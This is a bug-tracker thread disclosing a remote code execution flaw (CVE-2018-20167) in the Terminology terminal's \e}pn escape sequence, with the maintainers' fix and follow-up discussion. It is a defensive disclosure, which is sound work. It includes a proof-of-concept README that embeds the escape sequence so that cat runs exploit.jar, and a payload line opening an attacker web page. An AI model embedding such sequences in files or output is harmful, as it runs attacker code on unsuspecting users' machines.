
media_unknown_handle in \e}pn<FILE>\0 control sequence allows remote code execution (RCE)
Closed, Resolved, Public

Description

Custom Control Sequence Remote Code Execution (RCE)

CVSSv3: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Affected Versions: Terminology <= 1.3

The catch-all behaviour of the \e}pn control sequence in Terminology allows a remote attacker to execute code on the user's computer.

Background

Terminology includes several custom control sequences. These are activated with the \e} sequence.

The \e}pn sequence opens web pages and image files and is handled by the _popmedia function in win.c:4161.

Vulnerability

The \e}pn sequence allows a user to display media like an image or open a web page. However, all unknown media types are handled with the media_unknown_handle function which executes xdg-open against the file type. This creates a large attack surface that allows a remotely introduced executable file to be executed when that file's MIME type is registered for xdg-open.

This is true for most Linux systems that have a JRE/JDK installed and registered. The JRE registers java as the MIME handler for .jar files.

An attacker could therefore deliver a file containing the control sequence and a jar file causing the jar to be executed once the control sequence is rendered by Terminology.

Reproduce

To reproduce this unsafe behaviour, perform the following:

  1. Create a Java jar file containing a compiled class configured as the main class in the jar manifest (so it executes automatically)
  2. Run the following in the affected versions of terminology where <PATH> is the path to the jar file from #1.
printf "\e}pn<PATH>\0"

Exploit / PoC

Consider a Git project or source tarball uploaded to a site containing the following files:

README.md

# This is a simple README file

^[}pnexploit.jar^@

exploit.jar

When the Terminology user views the file with a program like cat:

cat README.md

the exploit.jar file will be executed without the user's knowledge.

Resolution

I would recommend that for the meantime all unknown media types be rejected by the control sequence. Currently Terminology has dedicated behaviour to handle the popup display of images and opening of web pages, whereas all other media types are unsafely deferred to a remote program where the ability to prevent malicious behaviour is outside of the control of Terminology.

The media_unknown_handle function should be removed and not called from _popmedia.

Consider that other than the remote code execution (of high impact), an attacker could also open a malicious web page with the same sequence and conduct XSS and other attacks against the Terminology user.

For this reason, I'd also recommend that the \e}pn control sequence be disabled by default so that only users that really want it can ensure it's enabled with a startup flag like --extra-sequences.
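The following C program is an added illustration of the two defensive points in the report above (a pre-display check for the \e}pn sequence from the Vulnerability section, and the "reject unknown media types, never defer to an external program" fix from the Resolution section). It is not Terminology's code: the function names (find_pn_sequence, classify_media, popmedia_decision), the extension allow-list and the SAMPLE_README bytes are all assumptions constructed for this example; only the ESC } p n ... NUL framing comes from the report.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the README from the report, as the bytes a terminal
 * would receive from `cat` (ESC '}' "pn" <target> NUL). Not a real file. */
static const unsigned char SAMPLE_README[] =
    "# This is a simple README file\n\n\x1b}pnexploit.jar\0\n";
static const size_t SAMPLE_README_LEN = sizeof(SAMPLE_README) - 1;

typedef enum { MEDIA_IMAGE, MEDIA_URL, MEDIA_UNKNOWN } media_kind_t;

/* Case-insensitive "does s end with suf". */
static int has_suffix_ci(const char *s, const char *suf)
{
    size_t ls = strlen(s), lf = strlen(suf);
    if (lf > ls)
        return 0;
    const char *tail = s + ls - lf;
    for (size_t k = 0; k < lf; k++)
        if (tolower((unsigned char)tail[k]) != tolower((unsigned char)suf[k]))
            return 0;
    return 1;
}

/* Illustrative allow-list classification (assumed policy, not Terminology's
 * own media detection): a few image extensions and http(s) URLs are
 * recognised; everything else is MEDIA_UNKNOWN. */
media_kind_t classify_media(const char *target)
{
    static const char *const image_ext[] = { ".png", ".jpg", ".jpeg", ".gif", ".bmp" };
    if (strncmp(target, "http://", 7) == 0 || strncmp(target, "https://", 8) == 0)
        return MEDIA_URL;
    for (size_t k = 0; k < sizeof image_ext / sizeof image_ext[0]; k++)
        if (has_suffix_ci(target, image_ext[k]))
            return MEDIA_IMAGE;
    return MEDIA_UNKNOWN;
}

/* Hardened stand-in for the _popmedia dispatch described in the report:
 * returns 1 when the target may be rendered as an in-terminal image popup and
 * 0 when it must be dropped. URLs and unknown types are never handed to an
 * external program, so there is no xdg-open path left to reach. */
int popmedia_decision(const char *target)
{
    return classify_media(target) == MEDIA_IMAGE;
}

/* Defender-side scan of untrusted text before it is printed: find the first
 * ESC } p n ... NUL sequence in buf, copy its target into out (NUL-terminated,
 * truncated to outlen-1 bytes) and return 1; return 0 if none is complete. */
int find_pn_sequence(const unsigned char *buf, size_t len, char *out, size_t outlen)
{
    if (outlen == 0)
        return 0;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (buf[i] != 0x1b || buf[i + 1] != '}' || buf[i + 2] != 'p' || buf[i + 3] != 'n')
            continue;
        size_t start = i + 4, end = start;
        while (end < len && buf[end] != '\0')
            end++;
        if (end == len)
            return 0; /* no terminating NUL: not a complete sequence */
        size_t n = end - start;
        if (n >= outlen)
            n = outlen - 1;
        memcpy(out, buf + start, n);
        out[n] = '\0';
        return 1;
    }
    return 0;
}

int main(void)
{
    char target[256];
    if (find_pn_sequence(SAMPLE_README, SAMPLE_README_LEN, target, sizeof target)) {
        printf("found \\e}pn sequence targeting \"%s\": %s\n", target,
               popmedia_decision(target) ? "would be shown as an image"
                                         : "rejected (not an image)");
    } else {
        printf("no \\e}pn sequence in sample\n");
    }
    return 0;
}
```

Run against the constructed README the scanner reports the target exploit.jar and the hardened dispatch rejects it; a .png target would be accepted for in-terminal display, and an http(s) URL is rejected as well, matching the thread's eventual outcome that \e}pn no longer opens a browser.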

pajexali triaged this task as High priority.
pajexali created this object with visibility "All Users".
billiob claimed this task.

You are right.
I'll fix it in Terminology 1.3.1 soon.

billiob changed the visibility from "All Users" to "Public (No Login Required)". Dec 16 2018, 2:35 AM

Thanks for looking into this.

Let me know if you want to discuss remediation strategies or help working on a patch.

I will get a CVE number assigned as this will likely affect the security of Terminology users until the patch is released.

I've removed media_unknown_handle().
The terminology escape codes can already be disabled in the settings panel.

How do you want to be credited?

Sounds good. Let me know when this is available in the Terminology master branch.

Having the \e}pn sequence enabled by default means that even with media_unknown_handle() removed, malicious web pages can still be opened in the same manner:

^[}pnhttp://basite.hacked\0

This would be less effective at compromising the operating system (as the attack is now limited to the browser's sandbox) but still gives significant control to a remote attacker.

My suggestion would be to also have this control sequence disabled by default, so that only when a user aware of its functionality wants to enable it, they can launch their Terminology instance with a flag (like --custom-escapes) to enable it each time.

This is easy to do with a keybinding for your window manager, alias, script etc.

As for credit, please reference me as:

Ben N <pajexali@gmail.com>

\e}pn will no longer open a browser.

CVE-2018-20167 has now been assigned to this vulnerability and made public.

Thanks again for the quick investigation of this one.

jeyzu added a subscriber: jeyzu. Dec 17 2018, 7:09 AM

Hello,
I really miss my single left click on an url to open it through xdg-open.
Could this behaviour be restored? To me it has nothing to do with the present issue.

I'll fix that soon. @jeyzu: Could I ask you to test the git version once I have it fixed?

jeyzu added a comment. Dec 17 2018, 8:00 AM

yep sure, I'm pulling/updating on a daily basis ;)

billiob reopened this task as Open. Dec 17 2018, 12:52 PM

It's working seamlessly, thanks a lot.
A little notification like "url opened" could be a plus ;)